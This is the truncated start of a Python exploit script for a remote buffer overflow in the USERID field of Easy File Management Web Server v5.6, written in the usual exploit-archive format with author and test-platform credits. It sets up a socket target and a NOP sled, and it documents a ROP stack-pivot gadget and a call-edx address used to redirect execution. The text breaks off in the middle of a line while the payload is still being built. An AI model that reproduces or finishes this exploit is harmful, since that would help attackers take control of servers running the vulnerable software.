#!/usr/bin/python # Exploit Title: Easy File Management Web Server v5.6 - USERID Remote Buffer Overflow # Version: 5.6 # Date: 2015-08-17 # Author: Tracy Turben (tracyturben@gmail.com) # Software Link: http://www.efssoft.com/ # Tested on: Win7x32-EN # Special Thanks To: Julien Ahrens for the crafted jmp esp Trick ;) # Credits for vulnerability discovery: # superkojiman (http://www.exploit-db.com/exploits/33453/) from struct import pack import socket,sys import os host="" port=80 junk0 = "\x90" * 80 # 0x1001d89b : {pivot 604 / 0x25c} # POP EDI # POP ESI # POP EBP # POP EBX # ADD ESP,24C # RETN [ImageLoad.dll] # The memory located at 0x1001D8F0: "\x7A\xD8\x01\x10" does the job! # Due to call dword ptr [edx+28h]: 0x1001D8F0 - 28h = 0x1001D8C8 call_edx=pack('